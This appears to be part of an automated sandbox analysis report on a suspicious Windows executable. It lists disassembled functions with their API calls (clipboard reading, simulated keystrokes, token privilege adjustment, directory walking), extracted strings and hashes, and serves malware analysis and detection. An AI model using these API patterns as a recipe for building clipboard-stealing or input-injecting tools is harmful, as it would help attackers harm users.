                                                    • Instruction ID: 8c1b5e9684b2e22b8b86567ed48eb125b41bfc3f6b0adaa3887a9c221935e27a
                                                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                    • Instruction Fuzzy Hash: 29E092B0104B005FD7348A24D8107E3B3E5AB06315F00081CF6AB83341EB62B8418B69
                                                    Function 00605DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0063E16B,?,?,00000000), ref: 00605DBF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 599bc60eb5d142ce8b946459659a9d852bbd066e9151f8a322e6a4eab9bbc41c
                                                    • Instruction ID: 0a7523272d942f432b40d8ff05cd96f24c28374820caab7626609dc848028784
                                                    • Opcode Fuzzy Hash: 599bc60eb5d142ce8b946459659a9d852bbd066e9151f8a322e6a4eab9bbc41c
                                                    • Instruction Fuzzy Hash: 77D0C77464020CBFE710DB80DC46FA9777DD705710F200294FD0456290D6B27D508795
                                                    Function 0062548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: 8cc2eb7fcba04a731dda632c5181117ae136307e0eccefd65c2bd4938a2e5664
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: D0B0927684060C77DE512E82FC02A697B5A9B44778F808020FB0C18162A673A6A09A8A
                                                    Function 0066D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 0066D46A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: da66c03d9b74fad4d1059a0939350e66e8d6f8f07dabd408e505e758b17ee08e
                                                    • Instruction ID: b7d0bdbc63e6501759902ff3110419eb25e1e02bbfffe4cac8610f4e39b829f2
                                                    • Opcode Fuzzy Hash: da66c03d9b74fad4d1059a0939350e66e8d6f8f07dabd408e505e758b17ee08e
                                                    • Instruction Fuzzy Hash: AE7140306447018FC758EF28D491AABB7E2AF88354F04496DF8969B3A2DF30ED45CB56
                                                    Function 00620E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 466773f87dd7e34b16bd27a90b0fff19a8e4343ac646f8186d96f2e87546097e
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 4A31F370A00915DFE718DF48E5849A9F7A6FF59300B258AA5E849CB752D730EDC1CF80
                                                    Function 039422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 039422B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1662698170.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_3940000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: 19c5cb660c2a693928b98bbd12a1aecc78d73170b46c06cf7b56c0b093bfb65f
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: D6E0E67494010EDFDB00EFB8D54969E7FB4FF04301F1005A1FD01D2280D6309D508A72

                                                    Non-executed Functions

                                                    Function 0068CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0068CE50
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068CE91
                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0068CED6
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068CF00
                                                    • SendMessageW.USER32 ref: 0068CF29
                                                    • _wcsncpy.LIBCMT ref: 0068CFA1
                                                    • GetKeyState.USER32(00000011), ref: 0068CFC2
                                                    • GetKeyState.USER32(00000009), ref: 0068CFCF
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068CFE5
                                                    • GetKeyState.USER32(00000010), ref: 0068CFEF
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068D018
                                                    • SendMessageW.USER32 ref: 0068D03F
                                                    • SendMessageW.USER32(?,00001030,?,0068B602), ref: 0068D145
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0068D15B
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0068D16E
                                                    • SetCapture.USER32(?), ref: 0068D177
                                                    • ClientToScreen.USER32(?,?), ref: 0068D1DC
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0068D1E9
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0068D203
                                                    • ReleaseCapture.USER32 ref: 0068D20E
                                                    • GetCursorPos.USER32(?), ref: 0068D248
                                                    • ScreenToClient.USER32(?,?), ref: 0068D255
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0068D2B1
                                                    • SendMessageW.USER32 ref: 0068D2DF
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0068D31C
                                                    • SendMessageW.USER32 ref: 0068D34B
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0068D36C
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0068D37B
                                                    • GetCursorPos.USER32(?), ref: 0068D39B
                                                    • ScreenToClient.USER32(?,?), ref: 0068D3A8
                                                    • GetParent.USER32(?), ref: 0068D3C8
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0068D431
                                                    • SendMessageW.USER32 ref: 0068D462
                                                    • ClientToScreen.USER32(?,?), ref: 0068D4C0
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0068D4F0
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0068D51A
                                                    • SendMessageW.USER32 ref: 0068D53D
                                                    • ClientToScreen.USER32(?,?), ref: 0068D58F
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0068D5C3
                                                      • Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0068D65F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F$prl
                                                    • API String ID: 3977979337-212714731
                                                    • Opcode ID: 47cf5b37665722102830c1d2d1d97a56a9b81a3a05ef4c7006da71c34de5d5de
                                                    • Instruction ID: f8dddfd67932aa9eb754a8f94089af37c2fc60cc4148458e3bcdacb2413a0f28
                                                    • Opcode Fuzzy Hash: 47cf5b37665722102830c1d2d1d97a56a9b81a3a05ef4c7006da71c34de5d5de
                                                    • Instruction Fuzzy Hash: 12429C70204241AFD725EF28C888FAABBE7FF49324F14071DF695872A1D7719851CBA6
                                                    Function 0068804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0068873F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 3850602802-328681919
                                                    • Opcode ID: 73a4f793928241e48f63f9d1e61be4011f47e7dca3cbb440b876847fe8b25195
                                                    • Instruction ID: e73f96eeb7a707a0b48e87dbb824c8a9216354506e409aec40f5f9af15f73105
                                                    • Opcode Fuzzy Hash: 73a4f793928241e48f63f9d1e61be4011f47e7dca3cbb440b876847fe8b25195
                                                    • Instruction Fuzzy Hash: 7312B071540214AFEB25AF24DC49FAE7BBAEF85310F644229F915EB2E1EF708941CB10
                                                    Function 0061710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_memset
                                                    • String ID: 0wk$DEFINE$Oaa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                    • API String ID: 1357608183-1522621379
                                                    • Opcode ID: 71384e9b7bfc5ece41b52dace7242bd380ecf43e4924f7b28782ba67cbfcd934
                                                    • Instruction ID: bb9dbf79a9f669e7ef16c6eb0a4786a837c5eb04edc079857c0dcd82ac81715d
                                                    • Opcode Fuzzy Hash: 71384e9b7bfc5ece41b52dace7242bd380ecf43e4924f7b28782ba67cbfcd934
                                                    • Instruction Fuzzy Hash: AF939171A04216DFDB24CF58C891BEDB7B2FF48715F24816AE955AB380E7709E86CB40
                                                    Function 00604A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00604A3D
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0063DA8E
                                                    • IsIconic.USER32(?), ref: 0063DA97
                                                    • ShowWindow.USER32(?,00000009), ref: 0063DAA4
                                                    • SetForegroundWindow.USER32(?), ref: 0063DAAE
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0063DAC4
                                                    • GetCurrentThreadId.KERNEL32 ref: 0063DACB
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0063DAD7
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0063DAE8
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0063DAF0
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0063DAF8
                                                    • SetForegroundWindow.USER32(?), ref: 0063DAFB
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063DB10
                                                    • keybd_event.USER32(00000012,00000000), ref: 0063DB1B
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063DB25
                                                    • keybd_event.USER32(00000012,00000000), ref: 0063DB2A
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063DB33
                                                    • keybd_event.USER32(00000012,00000000), ref: 0063DB38
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0063DB42
                                                    • keybd_event.USER32(00000012,00000000), ref: 0063DB47
                                                    • SetForegroundWindow.USER32(?), ref: 0063DB4A
                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0063DB71
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: 6f76c32e119e678b13794a12a55ef5b52e402dabb40435309f711de437b32fdb
                                                    • Instruction ID: 3d06a44c0bb180c6517a800e5d5add8a522e41b9948e0067a3f0a61f80d81cce
                                                    • Opcode Fuzzy Hash: 6f76c32e119e678b13794a12a55ef5b52e402dabb40435309f711de437b32fdb
                                                    • Instruction Fuzzy Hash: A931C871A80318BFEB206F619C49FBF7E6EEB44B50F114135FA01E61D0D6B05D41ABA1
                                                    Function 00658858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00658CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00658D0D
                                                      • Part of subcall function 00658CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658D3A
                                                      • Part of subcall function 00658CC3: GetLastError.KERNEL32 ref: 00658D47
                                                    • _memset.LIBCMT ref: 0065889B
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006588ED
                                                    • CloseHandle.KERNEL32(?), ref: 006588FE
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00658915
                                                    • GetProcessWindowStation.USER32 ref: 0065892E
                                                    • SetProcessWindowStation.USER32(00000000), ref: 00658938
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00658952
                                                      • Part of subcall function 00658713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00658851), ref: 00658728
                                                      • Part of subcall function 00658713: CloseHandle.KERNEL32(?,?,00658851), ref: 0065873A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: 435a05714f3d6858217a76fddc0b6cceaeb72cc8fe14911809e9a8195bdad3cf
                                                    • Instruction ID: 0014a142bf6c7bb3843d25b26c1bf85e39eec3738b0fa474b27565fb9a04f1db
                                                    • Opcode Fuzzy Hash: 435a05714f3d6858217a76fddc0b6cceaeb72cc8fe14911809e9a8195bdad3cf
                                                    • Instruction Fuzzy Hash: 2C814871900249BFDF11DFA4DC45AEE7BBAEF08305F18426AFD10B7661DB318A589B60
                                                    Function 0067425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenClipboard.USER32(0068F910), ref: 00674284
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00674292
                                                    • GetClipboardData.USER32(0000000D), ref: 0067429A
                                                    • CloseClipboard.USER32 ref: 006742A6
                                                    • GlobalLock.KERNEL32(00000000), ref: 006742C2
                                                    • CloseClipboard.USER32 ref: 006742CC
                                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 006742E1
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 006742EE
                                                    • GetClipboardData.USER32(00000001), ref: 006742F6
                                                    • GlobalLock.KERNEL32(00000000), ref: 00674303
                                                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00674337
                                                    • CloseClipboard.USER32 ref: 00674447
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: 8242fc28941ff24b1e8c8cea67e348b74684dff510aaa761e4fb52faaffc31ca
                                                    • Instruction ID: 4793c6731e9fd352e9a7e76985a720ca3a40588b95baacd263f271c91a727609
                                                    • Opcode Fuzzy Hash: 8242fc28941ff24b1e8c8cea67e348b74684dff510aaa761e4fb52faaffc31ca
                                                    • Instruction Fuzzy Hash: E651A331244301ABD700EF64DC99FAF77AAAF44B10F10462DF55AD22E2DF70DA058B66
                                                    Function 0066C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0066C9F8
                                                    • FindClose.KERNEL32(00000000), ref: 0066CA4C
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066CA71
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066CA88
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0066CAAF
                                                    • __swprintf.LIBCMT ref: 0066CAFB
                                                    • __swprintf.LIBCMT ref: 0066CB3E
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                    • __swprintf.LIBCMT ref: 0066CB92
                                                      • Part of subcall function 006238D8: __woutput_l.LIBCMT ref: 00623931
                                                    • __swprintf.LIBCMT ref: 0066CBE0
                                                      • Part of subcall function 006238D8: __flsbuf.LIBCMT ref: 00623953
                                                      • Part of subcall function 006238D8: __flsbuf.LIBCMT ref: 0062396B
                                                    • __swprintf.LIBCMT ref: 0066CC2F
                                                    • __swprintf.LIBCMT ref: 0066CC7E
                                                    • __swprintf.LIBCMT ref: 0066CCCD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3953360268-2428617273
                                                    • Opcode ID: a9d70fb41db429cf006e4b62a75f16acd48adfeafeb8c8f9736a3ffefd69c0fb
                                                    • Instruction ID: 7abd8850e377b227ee6e70c5d1ee10b70e03a44121eeb64a561515b14b2b87df
                                                    • Opcode Fuzzy Hash: a9d70fb41db429cf006e4b62a75f16acd48adfeafeb8c8f9736a3ffefd69c0fb
                                                    • Instruction Fuzzy Hash: 1FA14FB1548304ABC744EBA4C985DAFB7EEEF94700F40491DF586C7192EB34DA48CB66
                                                    Function 0066F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0066F221
                                                    • _wcscmp.LIBCMT ref: 0066F236
                                                    • _wcscmp.LIBCMT ref: 0066F24D
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0066F25F
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0066F279
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0066F291
                                                    • FindClose.KERNEL32(00000000), ref: 0066F29C
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0066F2B8
                                                    • _wcscmp.LIBCMT ref: 0066F2DF
                                                    • _wcscmp.LIBCMT ref: 0066F2F6
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0066F308
                                                    • SetCurrentDirectoryW.KERNEL32(006BA5A0), ref: 0066F326
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0066F330
                                                    • FindClose.KERNEL32(00000000), ref: 0066F33D
                                                    • FindClose.KERNEL32(00000000), ref: 0066F34F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: b8c79bc911ee91d9590c4f90e1d6a33674079d157c00df2f2ca44a4af5ac22e2
                                                    • Instruction ID: 79fe2ad630b706fbb2929031af4bf1db94fd9116a89ccf317fcb2b239ee91415
                                                    • Opcode Fuzzy Hash: b8c79bc911ee91d9590c4f90e1d6a33674079d157c00df2f2ca44a4af5ac22e2
                                                    • Instruction Fuzzy Hash: C231B1765012197ADB20DBF4EC69ADE73AE9F48360F100275E810E3290EB71DB858FA4
